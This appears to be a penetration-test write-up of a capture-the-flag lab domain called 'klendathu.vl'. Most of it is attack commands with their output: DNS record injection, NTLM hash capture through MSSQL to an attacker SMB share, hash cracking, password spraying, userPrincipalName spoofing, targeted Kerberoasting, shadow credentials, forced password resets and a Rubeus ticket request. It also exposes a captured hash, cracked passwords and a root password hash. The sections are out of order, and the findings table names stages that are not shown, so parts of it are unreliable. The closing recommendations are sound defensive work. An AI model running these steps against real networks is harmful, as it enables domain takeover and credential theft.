Executive Summary

This comprehensive report documents a simulated penetration test aimed at assessing the security posture of a corporate network, with the ultimate goal of compromising a domain controller. The test was designed to emulate a sophisticated adversarial attack that strategically chains multiple cycles of lateral movement and privilege escalation. The test used a variety of attack techniques that align with the MITRE ATT&CK framework, each chosen to exploit specific weaknesses within the network.
Key findings include several high-risk vulnerabilities that allowed for successive breaches and escalations within the network infrastructure, culminating in complete control over the domain controller. The report concludes with targeted recommendations for strengthening the network’s defenses, improving detection capabilities, and reducing the overall attack surface.
python3 gssapi-abuse.py -d klendathu.vl dns -t attacker -a add --type A --data 10.8.2.41
python3 gssapi-abuse.py -d klendathu.vl dns --zone 2.8.10.in-addr.arpa -t 41 -a add --type PTR --data attacker.klendathu.vl.
# Generated by NetworkManager
search klendathu.vl net.rogers.com
nameserver 10.10.232.85
nameserver 64.71.255.198
nameserver 2607:f798:18:10:0:640:7125:5204
# NOTE: the libc resolver may not support more than 3 nameservers.
# The nameservers listed below may not be recognized.
nameserver 2607:f798:18:10:0:640:7125:5198
/etc/hosts
10.10.169.149 dc1.klendathu.vl dc1 klendathu.vl
10.10.169.150 srv1.kendathu.vl srv1
10.10.169.151 srv2.klendathu.vl srv2
/etc/krb5.conf
[libdefaults]
default_realm = klendathu.vl
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
[realms]
klendathu.vl = {
kdc = dc1.klendathu.vl
admin_server = dc1.klendathu.vl
}
select * from sys.dm_os_file_exists('\\10.8.2.41\Projects')
impacket-smbserver Projects /tmp -smb2support
RASCZAK::KLENDATHU:aaaaaaaaaaaaaaaa:4d26b714455e2a7314edc525e223385c:0101000000000000808ddfaae5afda01da603c0f3d0c5e1f00000000010010007000540076006f00470072007a005400030010007000540076006f00470072007a0054000200100049004700500077005300630061005600040010004900470050007700530063006100560007000800808ddfaae5afda01060004000200000008003000300000000000000000000000003000001000db172de54e605997d679e908a34d1f80c0e58d7d484e6d46f57bfb2fc2b00a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0032002e00340031000000000000000000
hashcat rasczak_hash /usr/share/wordlists/rockyou.txt
starship99
dn: CN=RICO,CN=Users,DC=KLENDATHU,DC=VL
changetype: modify
replace: userPrincipalName
userPrincipalName: leivy
└─$ cat modify_upn.ldif
dn: CN=IBANEZ,CN=Users,DC=KLENDATHU,DC=VL
changetype: modify
replace: userPrincipalName
userPrincipalName: Administrator
ldapmodify -H ldap://dc1.klendathu.vl -Y GSSAPI -f modify_upn.ldif
ldapsearch -H ldap://dc1.klendathu.vl -Y GSSAPI -b "CN=RICO,CN=Users,DC=KLENDATHU,DC=VL" -s base "(objectClass=*)"
python3 ./targetedKerberoast.py -v -d klendathu.vl -u 'rasczak' -p 'starship99'
vim rich.hash
vim ibanez.hash
No success cracking the password.
python3 pywhisker.py -d "klendathu.vl" -u "rasczak" -p "starship99" --target "ibanez" --action "add" -e pem
Saved PEM certificate at path: TC4RwUeC_cert.pem
[+] Saved PEM private key at path: TC4RwUeC_priv.pem
Shadow credentials did not work.
net rpc password "ibanez" "starship99" -U "klendathu.vl"/"rasczak"%"starship99" -S 10.10.193.181
net rpc password "rico" "starship99" -U "klendathu.vl"/"rasczak"%"starship99" -S 10.10.193.181
.\Rubeus.exe asktgt /user:leivy /password:starship99 /domain:KLENDATHU.VL /dc:dc1.klendathu.vl /principaltype:enterprise /nowrap
./rubeustoccache.py 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 leivy.kirbi leivy.ccache
export KRB5CCNAME=leivy.ccache
ssh -K leivy@klendathu.vl@srv2.klendathu.vl
[root@srv2 ~]# cat flag.txt
VL{8ceb4b1bb4e74306d60d148fb85052fd}
High-Level Summary
- Key Vulnerabilities: Identified critical vulnerabilities included insecure service configurations and credential misuse.
- Attack Path: Demonstrated a multi-layered attack strategy involving multiple stages of lateral movement and privilege escalations.
- Impact: Full domain compromise was achieved, highlighting significant risks in current security practices and the potential for severe data breaches and system manipulation.
Key Findings
| Stage | Target Service | Technique | CVSS Score | Impact |
|---|---|---|---|---|
| 1 | SMB Shares | Credential Access | 6.5 | Medium |
| 2 | SMB Shares | Data from Local System | 7.0 | High |
| 3 | Active Directory Users | Password Spraying for Valid Account Identification | 7.5 | High |
| 4 | Changing Passwords | Account Manipulation | 8.0 | High |
| 5 | Active Directory | Directory Service Discovery | 7.8 | High |
| 6 | Active Directory | Modification of Group Membership & Extracting Service Account Credentials | 8.2, 7.5 | High |
| 7 | Domain Controller | Remote Code Execution | 8.5 | High |
| 8 | Privilege Escalation | Silver Ticket Attack, SeImpersonatePrivilege | 9.0 | Critical |
Attack Flow and Narrative
Detailed Findings
| ID | IP | Domain | DC |
|---|---|---|---|
| DC1 | 10.10.216.165 | klendathu.vl | DC1.klendathu.vl |
| SRV1 | 10.10.216.166 | klendathu.vl | DC1.klendathu.vl |
| Linux Machine | 10.10.216.167 | | |
Enumeration: Phase-1
Port Scanning (10.10.216.167)
sudo nmap -sC -sV -oA linux 10.10.216.167
| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.7 |
| 111 | rpcbind | 2-4 |
| 2049 | nfs_acl | 3 |
showmount -e 10.10.216.167

mkdir shared
sudo mount -t nfs -o vers=3,nolock 10.10.216.167:/mnt/nfs_shares ./shared
| Category | Details |
|---|---|
| Hostname | Switch |
| Enable Password | C1sc0 (plaintext) |
| Enable Secret | j61qxI/P$dPYII5uCu83j8/FIuT2Wb/ (football22) |
| Console Line Password | 123456 |
| VTY Line Passwords | 123456 (for both 0-4 and 5-15) |
| SNMP Contact | ZIM@KLENDATHU.VL |
echo '$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/' > hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt
$1$j61qxI/P$dPYII5uCu83j8/FIuT2Wb/:football22
Now, with the list of usernames and passwords, we attempt password spraying.
Password Spraying
cme smb ips.txt -u 'users.txt' -p 'passwords.txt' --continue-on-success

User enumeration
cme smb ips.txt -u 'zim' -p 'football22' --users
| Domain User | Description |
|---|---|
| KLENDATHU.VL\Administrator | Built-in account for administering the computer/domain |
| KLENDATHU.VL\Guest | Built-in account for guest access to the computer/domain |
| KLENDATHU.VL\krbtgt | Key Distribution Center Service Account |
| KLENDATHU.VL\RICO | |
| KLENDATHU.VL\JENKINS | |
| KLENDATHU.VL\IBANEZ | |
| KLENDATHU.VL\ZIM | |
| KLENDATHU.VL\DELADRIER | |
| KLENDATHU.VL\ALPHARD | |
| KLENDATHU.VL\LEIVY | |
| KLENDATHU.VL\FRANKEL | |
| KLENDATHU.VL\HENDRICK | |
| KLENDATHU.VL\PATERSON | |
| KLENDATHU.VL\AZUMA | |
| KLENDATHU.VL\CHERENKOV | |
| KLENDATHU.VL\CLEA | |
| KLENDATHU.VL\DUNN | |
| KLENDATHU.VL\FLORES | |
| KLENDATHU.VL\SHUJUMI | |
| KLENDATHU.VL\BARCALOW | |
| KLENDATHU.VL\BRECKENRIDGE | |
| KLENDATHU.VL\BYRD | |
| KLENDATHU.VL\MCINTHIRE | |
| KLENDATHU.VL\RASCZAK | |
| KLENDATHU.VL\svc_backup | Legacy account to sync data to users Home Directories |
BloodHound Data Collection
cme ldap ips.txt -u 'zim' -p 'football22' --bloodhound -c all -ns 10.10.216.165
MSSQL (10.10.216.166)
mssqlclient.py KLENDATHU.VL/zim:football22@10.10.216.166 -windows-auth
Recommendations
SMB Shares (Credential Access and Data Exposure)
- Secure SMB Shares: Ensure that SMB shares are properly secured. Disable guest access and enforce strong access control policies.
- Data Encryption: Encrypt sensitive data stored on SMB shares to prevent unauthorized access.
Active Directory (Password Spraying, Account Manipulation, Directory Service Discovery)
- Account Lockout and Monitoring: Enforce an account lockout policy and alert on authentication failures spread across many accounts, which is the signature of the password spraying performed in this test.
- Audit Directory Changes: Alert on password resets, userPrincipalName modifications, and group membership changes made by non-administrative accounts, since each of these was used in the attack path.
Conclusion
By following the above recommendations, the security posture of the network can be significantly improved, reducing the risk of future breaches and ensuring a more robust defense against sophisticated cyber attacks.
Loot
[root@srv2 ~]# cat anaconda-ks.cfg
# Generated by Anaconda 34.25.4.7
# Generated by pykickstart v3.32
#version=RHEL9
# Use text mode install
text
%addon com_redhat_kdump --disable
%end
# System language
lang en_US.UTF-8
# Network information
#network --bootproto=static --device=ens160 --gateway=172.23.10.1 --ip=172.23.10.92 --nameserver=172.23.10.90 --netmask=255.255.255.0 --activate
network --hostname=srv2
%packages
@^server-product-environment
%end
# Run the Setup Agent on first boot
firstboot --enable
# Do not configure the X Window System
skipx
# Generated using Blivet version 3.6.0
ignoredisk --only-use=nvme0n1
# System bootloader configuration
bootloader --location=mbr --boot-drive=nvme0n1
autopart
# Partition clearing information
clearpart --all --initlabel --drives=nvme0n1
# System timezone
timezone America/New_York --utc
# Root password
rootpw --iscrypted $6$K0nkB9PnZ1DOJZAr$GzWFDigX5/QoFje5Mq8on9JcR2ba2gZjwBwWsx1.g8HELZiRCBWdNsDeFClAep2q7e.urhvhB/N7WxBP8NskQ0